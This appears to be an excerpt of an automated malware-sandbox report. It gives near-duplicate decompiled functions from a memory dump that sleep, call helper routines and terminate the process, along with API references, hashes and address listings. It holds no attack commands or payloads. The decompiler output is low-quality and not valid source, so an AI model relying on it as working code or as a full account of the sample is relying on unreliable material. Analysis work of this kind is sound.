                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t8;
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("sbb ebx, ebp");
                				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401826
                0x00401826
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t10;
                				void* _t13;
                				intOrPtr* _t19;
                				void* _t22;
                				void* _t25;
                
                				_t26 = __eflags;
                				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                				_t19 =  *((intOrPtr*)(_t25 + 8));
                				Sleep(0x1388);
                				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                				if(_t13 != 0) {
                					_push( *((intOrPtr*)(_t25 + 0x14)));
                					_push( *((intOrPtr*)(_t25 - 4)));
                					_push(_t13);
                					_push(_t19); // executed
                					L00401455(0x60, _t22, __edi); // executed
                				}
                				 *_t19(0xffffffff, 0); // executed
                				_t19 = _t19 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401834
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                Uniqueness

                Uniqueness Score: -1.00%